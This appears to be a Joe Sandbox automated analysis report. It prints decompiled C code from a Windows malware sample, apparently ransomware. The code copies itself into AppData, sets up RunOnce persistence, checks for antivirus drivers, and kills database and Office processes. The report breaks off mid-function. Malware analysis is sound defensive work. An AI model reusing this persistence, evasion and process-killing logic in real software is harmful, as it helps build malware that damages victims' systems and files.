0x0f4e44fd
0x0f4e4505
0x0f4e450d
0x0f4e4515
0x0f4e451d
0x0f4e4525
0x0f4e452d
0x0f4e4535
0x0f4e453d
0x0f4e4545
0x0f4e4555
0x0f4e455b
0x0f4e4562
0x0f4e456f
0x0f4e4575
0x0f4e4562
0x0f4e4586
0x0f4e4593
0x0f4e459d

APIs

lstrcpyW.KERNEL32 ref: 0F4E43E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E43E9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F4E4555
wsprintfW.USER32 ref: 0F4E456F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0F4E4586

Strings

h, xrefs: 0F4E4525
n, xrefs: 0F4E453D
r, xrefs: 0F4E449D
., xrefs: 0F4E44B5
t, xrefs: 0F4E4465
l, xrefs: 0F4E44FD
j, xrefs: 0F4E44A5
h, xrefs: 0F4E445D
n, xrefs: 0F4E44D5
., xrefs: 0F4E4535
o, xrefs: 0F4E44DD
m, xrefs: 0F4E452D
/, xrefs: 0F4E4475
w, xrefs: 0F4E44F5
s, xrefs: 0F4E446D
d, xrefs: 0F4E44E5
{USERID}, xrefs: 0F4E43BF, 0F4E440D, 0F4E4413
r, xrefs: 0F4E4495
-, xrefs: 0F4E450D
r, xrefs: 0F4E44BD
c, xrefs: 0F4E44AD
a, xrefs: 0F4E4505
t, xrefs: 0F4E448D
o, xrefs: 0F4E44CD
y, xrefs: 0F4E451D
d, xrefs: 0F4E44ED
/, xrefs: 0F4E44C5
w, xrefs: 0F4E4485
a, xrefs: 0F4E4515
w, xrefs: 0F4E447D

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: 39892d5821c6555d4d2e4e76db434e0bc01739b4271b717a298dad44687b8db6
Instruction ID: 38532aa35dd2646710c45e5bb52a62b5c54dff14970e5954b54dd57d16156fb5
Opcode Fuzzy Hash: 39892d5821c6555d4d2e4e76db434e0bc01739b4271b717a298dad44687b8db6
Instruction Fuzzy Hash: 95418CB4504340CBE720DF10D44836BBFE2FB8075AF50891DEA880B2A6D7FA859DCB56

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E2960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0F4E2960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0F4E82B0( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

0x0f4e296b
0x0f4e296d
0x0f4e2979
0x0f4e2980
0x0f4e2984
0x0f4e298c
0x0f4e2993
0x0f4e299a
0x0f4e29a8
0x0f4e29b0
0x0f4e29bd
0x0f4e29c7
0x0f4e29ce
0x0f4e29eb
0x0f4e29f8
0x0f4e29ff
0x0f4e2a06
0x0f4e2a0d
0x0f4e2a14
0x0f4e2a1b
0x0f4e2a22
0x0f4e2a29
0x0f4e2a30
0x0f4e2a37
0x0f4e2a3e
0x0f4e2a45
0x0f4e2a4c
0x0f4e2a53
0x0f4e2a5a
0x0f4e2a61
0x0f4e2a68
0x0f4e2a6f
0x0f4e2a76
0x0f4e2a7d
0x0f4e2a84
0x0f4e2a8c
0x0f4e2ac7
0x0f4e2a8e
0x0f4e2aa4
0x0f4e2aaf
0x0f4e2ab1
0x0f4e2ab7
0x0f4e2abf
0x0f4e2abf

APIs

lstrlenW.KERNEL32(00520050,00000041,747582B0,00000000), ref: 0F4E299D

Part of subcall function 0F4E82B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F4E82CD
Part of subcall function 0F4E82B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F4E82FB
Part of subcall function 0F4E82B0: GetModuleHandleA.KERNEL32(?), ref: 0F4E834F
Part of subcall function 0F4E82B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F4E835D
Part of subcall function 0F4E82B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F4E836C
Part of subcall function 0F4E82B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F4E83B5
Part of subcall function 0F4E82B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E83C3

RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F4E2C45,00000000), ref: 0F4E2A84
lstrlenW.KERNEL32(00000000), ref: 0F4E2A8F
RegSetValueExW.KERNEL32(0F4E2C45,00520050,00000000,00000001,00000000,00000000), ref: 0F4E2AA4
RegCloseKey.KERNEL32(0F4E2C45), ref: 0F4E2AB1

Strings

n, xrefs: 0F4E2A76
A, xrefs: 0F4E298C
i, xrefs: 0F4E2A5A
\, xrefs: 0F4E2A14
R, xrefs: 0F4E29CE
V, xrefs: 0F4E2A4C
n, xrefs: 0F4E2A6F
i, xrefs: 0F4E29F8
f, xrefs: 0F4E2A0D
n, xrefs: 0F4E2A61
s, xrefs: 0F4E2A06
r, xrefs: 0F4E29FF
S, xrefs: 0F4E29B0
d, xrefs: 0F4E2A22
u, xrefs: 0F4E2A37
r, xrefs: 0F4E2A3E
n, xrefs: 0F4E2A45
i, xrefs: 0F4E2A1B
F, xrefs: 0F4E29BD
\, xrefs: 0F4E2A30
I, xrefs: 0F4E2979
\, xrefs: 0F4E29EB
W, xrefs: 0F4E29C7
e, xrefs: 0F4E2A7D
R, xrefs: 0F4E2A68
P, xrefs: 0F4E296D
w, xrefs: 0F4E2A29
H, xrefs: 0F4E2993
r, xrefs: 0F4E2A53
U, xrefs: 0F4E2984

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: df700e4dd9f7863a1a705e130bbc38b1a1d9ef0723c741e9d96630522feeda64
Instruction ID: 663d106e34218b94bce2ca453e08eb9a2ca98185a667f5f0ef9e20061d4deef6
Opcode Fuzzy Hash: df700e4dd9f7863a1a705e130bbc38b1a1d9ef0723c741e9d96630522feeda64
Instruction Fuzzy Hash: E531EDB0D0021DDFEB20CF91E949BEDBFB9FB01709F104159D9186A282D7FA49488F54

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E2D30 Relevance: 56.1, APIs: 19, Strings: 13, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0F4E2D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0F4E2F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0F4E2C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0F4E2D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0F4E2F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0F4E2F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0F4E30A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0F4E2AD0(); // executed
				goto L5;
			}

0x0f4e2d39
0x0f4e2d3a
0x0f4e2d3d
0x0f4e2d45
0x0f4e2d4a
0x0f4e2d52
0x0f4e2d5a
0x0f4e2d62
0x0f4e2d67
0x0f4e2d6f
0x0f4e2d77
0x0f4e2d7f
0x0f4e2d87
0x0f4e2d8e
0x0f4e2de9
0x0f4e2df1
0x0f4e2df9
0x0f4e2e01
0x0f4e2e09
0x0f4e2e11
0x0f4e2e22
0x0f4e2e26
0x0f4e2e3d
0x0f4e2e41
0x0f4e2e49
0x0f4e2e51
0x0f4e2e5f
0x0f4e2e68
0x0f4e2e6e
0x0f4e2e73
0x0f4e2e7b
0x0f4e2eaf
0x0f4e2eb4
0x0f4e2ebc
0x0f4e2ec8
0x0f4e2ecf
0x0f4e2ee3
0x0f4e2eeb
0x0f4e2eee
0x0f4e2eee
0x0f4e2f09
0x0f4e2f3d
0x0f4e2f3f
0x0f4e2f0b
0x0f4e2f17
0x0f4e2f1c
0x0f4e2f25
0x00000000
0x0f4e2f17
0x0f4e2f09
0x0f4e2ebf
0x0f4e2ebf
0x0f4e2e75
0x0f4e2e75
0x0f4e2d94
0x0f4e2d9b
0x00000000
0x00000000
0x0f4e2da1
0x0f4e2da9
0x0f4e2db1
0x0f4e2db9
0x0f4e2dc1
0x0f4e2dc9
0x0f4e2dd0
0x00000000
0x00000000
0x0f4e2dd6
0x0f4e2ddd
0x00000000
0x00000000
0x0f4e2de3
0x0f4e2de4
0x00000000

APIs

Part of subcall function 0F4E2F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F4E2F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F4E2E19
LoadCursorW.USER32(00000000,00007F00), ref: 0F4E2E2E
LoadIconW.USER32 ref: 0F4E2E59
RegisterClassExW.USER32 ref: 0F4E2E68
ExitThread.KERNEL32 ref: 0F4E2E75

Part of subcall function 0F4E2F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F4E2F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F4E2E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F4E2E81
CreateWindowExW.USER32 ref: 0F4E2EA7
SetWindowLongW.USER32 ref: 0F4E2EB4
ExitThread.KERNEL32 ref: 0F4E2EBF

Part of subcall function 0F4E2F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0F4E2FA8
Part of subcall function 0F4E2F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0F4E2FCF
Part of subcall function 0F4E2F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F4E2FE3
Part of subcall function 0F4E2F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E2FFA

ExitThread.KERNEL32 ref: 0F4E2F3F

Part of subcall function 0F4E2AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F4E2AEA
Part of subcall function 0F4E2AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F4E2B2C
Part of subcall function 0F4E2AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F4E2B38
Part of subcall function 0F4E2AD0: ExitThread.KERNEL32 ref: 0F4E2C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F4E2EC8
UpdateWindow.USER32(00000000), ref: 0F4E2ECF
CreateThread.KERNEL32 ref: 0F4E2EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F4E2EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F4E2F05
TranslateMessage.USER32(?), ref: 0F4E2F1C
DispatchMessageW.USER32 ref: 0F4E2F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F4E2F37

Strings

s, xrefs: 0F4E2D77
firefox, xrefs: 0F4E2E9B
d, xrefs: 0F4E2DA9
f, xrefs: 0F4E2DA1
win32app, xrefs: 0F4E2E51, 0F4E2EA0
w, xrefs: 0F4E2DB1
@_w, xrefs: 0F4E2E2E
s, xrefs: 0F4E2DC1
k, xrefs: 0F4E2D67
1, xrefs: 0F4E2D6F
s, xrefs: 0F4E2DB9
0, xrefs: 0F4E2DF1
s, xrefs: 0F4E2D7F

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app$@_w
API String ID: 3011903443-1306002684
Opcode ID: b5d60447ad4881ac343cc1d79ea5de66a98cdab17aa305d6da7c3d435f46ba61
Instruction ID: cf2815823b8e1279d9e4221d42cd05a1d01277175e4833c2ed285152d5e8d17a
Opcode Fuzzy Hash: b5d60447ad4881ac343cc1d79ea5de66a98cdab17aa305d6da7c3d435f46ba61
Instruction Fuzzy Hash: 2A516470948301AFE310DF61CC09B9BBFE8AF44756F10451DFE849A282E7F99649CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E2AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0F4E2AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0F4E81F0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0F4E82B0( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0F4E81F0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0F4E2890(_v28, _t50); // executed
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0F4E2960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

0x0f4e2ad6
0x0f4e2aea
0x0f4e2af0
0x0f4e2af4
0x0f4e2af6
0x0f4e2b00
0x0f4e2b1c
0x0f4e2b1e
0x0f4e2b1e
0x0f4e2b02
0x0f4e2b02
0x0f4e2b02
0x0f4e2b08
0x0f4e2b10
0x0f4e2b12
0x0f4e2b14
0x0f4e2b14
0x0f4e2b28
0x0f4e2b2c
0x0f4e2b38
0x0f4e2b3e
0x0f4e2b43
0x0f4e2b48
0x0f4e2b4a
0x0f4e2b55
0x0f4e2b62
0x0f4e2b67
0x0f4e2b6c
0x0f4e2b75
0x0f4e2b89
0x0f4e2b8e
0x0f4e2b9c
0x0f4e2ba2
0x0f4e2ba5
0x0f4e2ba7
0x0f4e2bac
0x0f4e2bae
0x0f4e2be4
0x0f4e2bec
0x0f4e2bf4
0x0f4e2bf6
0x0f4e2bfd
0x0f4e2c02
0x0f4e2c05
0x0f4e2c07
0x00000000
0x00000000
0x0f4e2c0f
0x0f4e2c11
0x0f4e2c16
0x0f4e2c1d
0x0f4e2c2c
0x0f4e2c2c
0x0f4e2c2c
0x0f4e2c2e
0x0f4e2c2e
0x0f4e2c2f
0x0f4e2c35
0x0f4e2c3b
0x00000000
0x0f4e2c3d
0x0f4e2c25
0x0f4e2c2a
0x00000000
0x00000000
0x00000000
0x0f4e2c2a
0x0f4e2bb6
0x0f4e2bb8
0x0f4e2bbd
0x0f4e2bc4
0x0f4e2bd3
0x0f4e2bd3
0x0f4e2bd3
0x0f4e2bd5
0x0f4e2bd5
0x00000000
0x0f4e2bd5
0x0f4e2bcc
0x0f4e2bd1
0x00000000
0x00000000
0x00000000
0x0f4e2b4c
0x0f4e2b4c
0x0f4e2c40
0x0f4e2c40
0x0f4e2c45
0x0f4e2c47
0x0f4e2c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F4E2AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F4E2B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0F4E2B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F4E2B7D

Part of subcall function 0F4E82B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F4E82CD
Part of subcall function 0F4E82B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F4E82FB
Part of subcall function 0F4E82B0: GetModuleHandleA.KERNEL32(?), ref: 0F4E834F
Part of subcall function 0F4E82B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F4E835D
Part of subcall function 0F4E82B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F4E836C
Part of subcall function 0F4E82B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F4E83B5
Part of subcall function 0F4E82B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E83C3

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F4E2B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F4E2BE4
lstrcatW.KERNEL32(00000000,?), ref: 0F4E2BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 0F4E2BF4
wsprintfW.USER32 ref: 0F4E2C35
ExitThread.KERNEL32 ref: 0F4E2C47

Strings

.exe, xrefs: 0F4E2BEE
AppData, xrefs: 0F4E2B97
"%s", xrefs: 0F4E2C2F
P, xrefs: 0F4E2B55
U, xrefs: 0F4E2B75
\Microsoft\, xrefs: 0F4E2BDE
I, xrefs: 0F4E2B6C

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 6adc1b9acb3b2c80f86a7ecc3d09262d9e16c1c35e5161541f241f35ccdae360
Instruction ID: a775c1092b7a65e6f6c83d8c6ee82eae57f6e2de82c8731f96d5fff9bb4cd4e6
Opcode Fuzzy Hash: 6adc1b9acb3b2c80f86a7ecc3d09262d9e16c1c35e5161541f241f35ccdae360
Instruction Fuzzy Hash: 5A41B671A043109FE304DF21DC49B9B7B9DAF84716F04451DBD459A283DBBCDA09CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E48C0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0F4E48C0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
